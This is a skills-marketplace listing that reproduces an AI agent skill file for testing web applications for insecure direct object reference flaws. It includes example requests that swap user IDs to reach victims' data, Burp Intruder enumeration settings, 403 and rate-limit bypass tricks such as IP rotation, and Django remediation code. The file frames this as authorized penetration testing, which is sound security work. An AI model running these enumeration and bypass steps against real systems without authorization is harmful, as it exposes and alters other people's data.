How do I install IDOR Vulnerability Testing?

Install IDOR Vulnerability Testing with a single command: npx mdskills install sickn33/idor-testing. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support IDOR Vulnerability Testing?

IDOR Vulnerability Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

IDOR Vulnerability Testing

Name: IDOR Vulnerability Testing: AI Agent Skill
Rating: 9 (1 reviews)
Author: sickn33

Verified

Testing & QAIntermediate

This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." It provides comprehensive guidance for detecting, exploiting, and remediating IDOR vulnerabilities in web applications.

by @sickn331 installs0Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/idor-testing

Fork & Edit

Skill Advisor9.0

Comprehensive IDOR testing methodology with clear workflows, examples, and remediation guidance

+Provides systematic detection techniques with concrete code examples and Burp Suite workflows
+Includes extensive troubleshooting section covering bypass techniques and rate limiting
+Covers both horizontal and vertical privilege escalation with vulnerability verification methods
-Declares filesystem write permission without clear justification in the documented workflow

SKILL.md

Edit in Browser

1---
2name: IDOR Vulnerability Testing
3description: This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." It provides comprehensive guidance for detecting, exploiting, and remediating IDOR vulnerabilities in web applications.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# IDOR Vulnerability Testing
10 
11## Purpose
12 
13Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. This skill covers both database object references and static file references, detection techniques using parameter manipulation and enumeration, exploitation via Burp Suite, and remediation strategies for securing applications against unauthorized access.
14 
15## Inputs / Prerequisites
16 
17- **Target Web Application**: URL of application with user-specific resources
18- **Multiple User Accounts**: At least two test accounts to verify cross-user access
19- **Burp Suite or Proxy Tool**: Intercepting proxy for request manipulation
20- **Authorization**: Written permission for security testing
21- **Understanding of Application Flow**: Knowledge of how objects are referenced (IDs, filenames)
22 
23## Outputs / Deliverables
24 
25- **IDOR Vulnerability Report**: Documentation of discovered access control bypasses
26- **Proof of Concept**: Evidence of unauthorized data access across user contexts
27- **Affected Endpoints**: List of vulnerable API endpoints and parameters
28- **Impact Assessment**: Classification of data exposure severity
29- **Remediation Recommendations**: Specific fixes for identified vulnerabilities
30 
31## Core Workflow
32 
33### 1. Understand IDOR Vulnerability Types
34 
35#### Direct Reference to Database Objects
36Occurs when applications reference database records via user-controllable parameters:
37```
38# Original URL (authenticated as User A)
39example.com/user/profile?id=2023
40 
41# Manipulation attempt (accessing User B's data)
42example.com/user/profile?id=2022
43```
44 
45#### Direct Reference to Static Files
46Occurs when applications expose file paths or names that can be enumerated:
47```
48# Original URL (User A's receipt)
49example.com/static/receipt/205.pdf
50 
51# Manipulation attempt (User B's receipt)
52example.com/static/receipt/200.pdf
53```
54 
55### 2. Reconnaissance and Setup
56 
57#### Create Multiple Test Accounts
58```
59Account 1: "attacker" - Primary testing account
60Account 2: "victim" - Account whose data we attempt to access
61```
62 
63#### Identify Object References
64Capture and analyze requests containing:
65- Numeric IDs in URLs: `/api/user/123`
66- Numeric IDs in parameters: `?id=123&action=view`
67- Numeric IDs in request body: `{"userId": 123}`
68- File paths: `/download/receipt_123.pdf`
69- GUIDs/UUIDs: `/profile/a1b2c3d4-e5f6-...`
70 
71#### Map User IDs
72```
73# Access user ID endpoint (if available)
74GET /api/user-id/
75 
76# Note ID patterns:
77# - Sequential integers (1, 2, 3...)
78# - Auto-incremented values
79# - Predictable patterns
80```
81 
82### 3. Detection Techniques
83 
84#### URL Parameter Manipulation
85```
86# Step 1: Capture original authenticated request
87GET /api/user/profile?id=1001 HTTP/1.1
88Cookie: session=attacker_session
89 
90# Step 2: Modify ID to target another user
91GET /api/user/profile?id=1000 HTTP/1.1
92Cookie: session=attacker_session
93 
94# Vulnerable if: Returns victim's data with attacker's session
95```
96 
97#### Request Body Manipulation
98```
99# Original POST request
100POST /api/address/update HTTP/1.1
101Content-Type: application/json
102Cookie: session=attacker_session
103 
104{"id": 5, "userId": 1001, "address": "123 Attacker St"}
105 
106# Modified request targeting victim
107{"id": 5, "userId": 1000, "address": "123 Attacker St"}
108```
109 
110#### HTTP Method Switching
111```
112# Original GET request may be protected
113GET /api/admin/users/1000 → 403 Forbidden
114 
115# Try alternative methods
116POST /api/admin/users/1000 → 200 OK (Vulnerable!)
117PUT /api/admin/users/1000 → 200 OK (Vulnerable!)
118```
119 
120### 4. Exploitation with Burp Suite
121 
122#### Manual Exploitation
123```
1241. Configure browser proxy through Burp Suite
1252. Login as "attacker" user
1263. Navigate to profile/data page
1274. Enable Intercept in Proxy tab
1285. Capture request with user ID
1296. Modify ID to victim's ID
1307. Forward request
1318. Observe response for victim's data
132```
133 
134#### Automated Enumeration with Intruder
135```
1361. Send request to Intruder (Ctrl+I)
1372. Clear all payload positions
1383. Select ID parameter as payload position
1394. Configure attack type: Sniper
1405. Payload settings:
141   - Type: Numbers
142   - Range: 1 to 10000
143   - Step: 1
1446. Start attack
1457. Analyze responses for 200 status codes
146```
147 
148#### Battering Ram Attack for Multiple Positions
149```
150# When same ID appears in multiple locations
151PUT /api/addresses/§5§/update HTTP/1.1
152 
153{"id": §5§, "userId": 3}
154 
155Attack Type: Battering Ram
156Payload: Numbers 1-1000
157```
158 
159### 5. Common IDOR Locations
160 
161#### API Endpoints
162```
163/api/user/{id}
164/api/profile/{id}
165/api/order/{id}
166/api/invoice/{id}
167/api/document/{id}
168/api/message/{id}
169/api/address/{id}/update
170/api/address/{id}/delete
171```
172 
173#### File Downloads
174```
175/download/invoice_{id}.pdf
176/static/receipts/{id}.pdf
177/uploads/documents/{filename}
178/files/reports/report_{date}_{id}.xlsx
179```
180 
181#### Query Parameters
182```
183?userId=123
184?orderId=456
185?documentId=789
186?file=report_123.pdf
187?account=user@email.com
188```
189 
190## Quick Reference
191 
192### IDOR Testing Checklist
193 
194| Test | Method | Indicator of Vulnerability |
195|------|--------|---------------------------|
196| Increment/Decrement ID | Change `id=5` to `id=4` | Returns different user's data |
197| Use Victim's ID | Replace with known victim ID | Access granted to victim's resources |
198| Enumerate Range | Test IDs 1-1000 | Find valid records of other users |
199| Negative Values | Test `id=-1` or `id=0` | Unexpected data or errors |
200| Large Values | Test `id=99999999` | System information disclosure |
201| String IDs | Change format `id=user_123` | Logic bypass |
202| GUID Manipulation | Modify UUID portions | Predictable UUID patterns |
203 
204### Response Analysis
205 
206| Status Code | Interpretation |
207|-------------|----------------|
208| 200 OK | Potential IDOR - verify data ownership |
209| 403 Forbidden | Access control working |
210| 404 Not Found | Resource doesn't exist |
211| 401 Unauthorized | Authentication required |
212| 500 Error | Potential input validation issue |
213 
214### Common Vulnerable Parameters
215 
216| Parameter Type | Examples |
217|----------------|----------|
218| User identifiers | `userId`, `uid`, `user_id`, `account` |
219| Resource identifiers | `id`, `pid`, `docId`, `fileId` |
220| Order/Transaction | `orderId`, `transactionId`, `invoiceId` |
221| Message/Communication | `messageId`, `threadId`, `chatId` |
222| File references | `filename`, `file`, `document`, `path` |
223 
224## Constraints and Limitations
225 
226### Operational Boundaries
227- Requires at least two valid user accounts for verification
228- Some applications use session-bound tokens instead of IDs
229- GUID/UUID references harder to enumerate but not impossible
230- Rate limiting may restrict enumeration attempts
231- Some IDOR requires chained vulnerabilities to exploit
232 
233### Detection Challenges
234- Horizontal privilege escalation (user-to-user) vs vertical (user-to-admin)
235- Blind IDOR where response doesn't confirm access
236- Time-based IDOR in asynchronous operations
237- IDOR in websocket communications
238 
239### Legal Requirements
240- Only test applications with explicit authorization
241- Document all testing activities and findings
242- Do not access, modify, or exfiltrate real user data
243- Report findings through proper disclosure channels
244 
245## Examples
246 
247### Example 1: Basic ID Parameter IDOR
248```
249# Login as attacker (userId=1001)
250# Navigate to profile page
251 
252# Original request
253GET /api/profile?id=1001 HTTP/1.1
254Cookie: session=abc123
255 
256# Response: Attacker's profile data
257 
258# Modified request (targeting victim userId=1000)
259GET /api/profile?id=1000 HTTP/1.1
260Cookie: session=abc123
261 
262# Vulnerable Response: Victim's profile data returned!
263```
264 
265### Example 2: IDOR in Address Update Endpoint
266```
267# Intercept address update request
268PUT /api/addresses/5/update HTTP/1.1
269Content-Type: application/json
270Cookie: session=attacker_session
271 
272{
273  "id": 5,
274  "userId": 1001,
275  "street": "123 Main St",
276  "city": "Test City"
277}
278 
279# Modify userId to victim's ID
280{
281  "id": 5,
282  "userId": 1000,  # Changed from 1001
283  "street": "Hacked Address",
284  "city": "Exploit City"
285}
286 
287# If 200 OK: Address created under victim's account
288```
289 
290### Example 3: Static File IDOR
291```
292# Download own receipt
293GET /api/download/5 HTTP/1.1
294Cookie: session=attacker_session
295 
296# Response: PDF of attacker's receipt (order #5)
297 
298# Attempt to access other receipts
299GET /api/download/3 HTTP/1.1
300Cookie: session=attacker_session
301 
302# Vulnerable Response: PDF of victim's receipt (order #3)!
303```
304 
305### Example 4: Burp Intruder Enumeration
306```
307# Configure Intruder attack
308Target: PUT /api/addresses/§1§/update
309Payload Position: Address ID in URL and body
310 
311Attack Configuration:
312- Type: Battering Ram
313- Payload: Numbers 0-20, Step 1
314 
315Body Template:
316{
317  "id": §1§,
318  "userId": 3
319}
320 
321# Analyze results:
322# - 200 responses indicate successful modification
323# - Check victim's account for new addresses
324```
325 
326### Example 5: Horizontal to Vertical Escalation
327```
328# Step 1: Enumerate user roles
329GET /api/user/1 → {"role": "user", "id": 1}
330GET /api/user/2 → {"role": "user", "id": 2}
331GET /api/user/3 → {"role": "admin", "id": 3}
332 
333# Step 2: Access admin functions with discovered ID
334GET /api/admin/dashboard?userId=3 HTTP/1.1
335Cookie: session=regular_user_session
336 
337# If accessible: Vertical privilege escalation achieved
338```
339 
340## Troubleshooting
341 
342### Issue: All Requests Return 403 Forbidden
343**Cause**: Server-side access control is implemented
344**Solution**:
345```
346# Try alternative attack vectors:
3471. HTTP method switching (GET → POST → PUT)
3482. Add X-Original-URL or X-Rewrite-URL headers
3493. Try parameter pollution: ?id=1001&id=1000
3504. URL encoding variations: %31%30%30%30 for "1000"
3515. Case variations for string IDs
352```
353 
354### Issue: Application Uses UUIDs Instead of Sequential IDs
355**Cause**: Randomized identifiers reduce enumeration risk
356**Solution**:
357```
358# UUID discovery techniques:
3591. Check response bodies for leaked UUIDs
3602. Search JavaScript files for hardcoded UUIDs
3613. Check API responses that list multiple objects
3624. Look for UUID patterns in error messages
3635. Try UUID v1 (time-based) prediction if applicable
364```
365 
366### Issue: Session Token Bound to User
367**Cause**: Application validates session against requested resource
368**Solution**:
369```
370# Advanced bypass attempts:
3711. Test for IDOR in unauthenticated endpoints
3722. Check password reset/email verification flows
3733. Look for IDOR in file upload/download
3744. Test API versioning: /api/v1/ vs /api/v2/
3755. Check mobile API endpoints (often less protected)
376```
377 
378### Issue: Rate Limiting Blocks Enumeration
379**Cause**: Application implements request throttling
380**Solution**:
381```
382# Bypass techniques:
3831. Add delays between requests (Burp Intruder throttle)
3842. Rotate IP addresses (proxy chains)
3853. Target specific high-value IDs instead of full range
3864. Use different endpoints for same resources
3875. Test during off-peak hours
388```
389 
390### Issue: Cannot Verify IDOR Impact
391**Cause**: Response doesn't clearly indicate data ownership
392**Solution**:
393```
394# Verification methods:
3951. Create unique identifiable data in victim account
3962. Look for PII markers (name, email) in responses
3973. Compare response lengths between users
3984. Check for timing differences in responses
3995. Use secondary indicators (creation dates, metadata)
400```
401 
402## Remediation Guidance
403 
404### Implement Proper Access Control
405```python
406# Django example - validate ownership
407def update_address(request, address_id):
408    address = Address.objects.get(id=address_id)
409    
410    # Verify ownership before allowing update
411    if address.user != request.user:
412        return HttpResponseForbidden("Unauthorized")
413    
414    # Proceed with update
415    address.update(request.data)
416```
417 
418### Use Indirect References
419```python
420# Instead of: /api/address/123
421# Use: /api/address/current-user/billing
422 
423def get_address(request):
424    # Always filter by authenticated user
425    address = Address.objects.filter(user=request.user).first()
426    return address
427```
428 
429### Server-Side Validation
430```python
431# Always validate on server, never trust client input
432def download_receipt(request, receipt_id):
433    receipt = Receipt.objects.filter(
434        id=receipt_id,
435        user=request.user  # Critical: filter by current user
436    ).first()
437    
438    if not receipt:
439        return HttpResponseNotFound()
440    
441    return FileResponse(receipt.file)
442```
443

Full transparency — inspect the skill content before installing.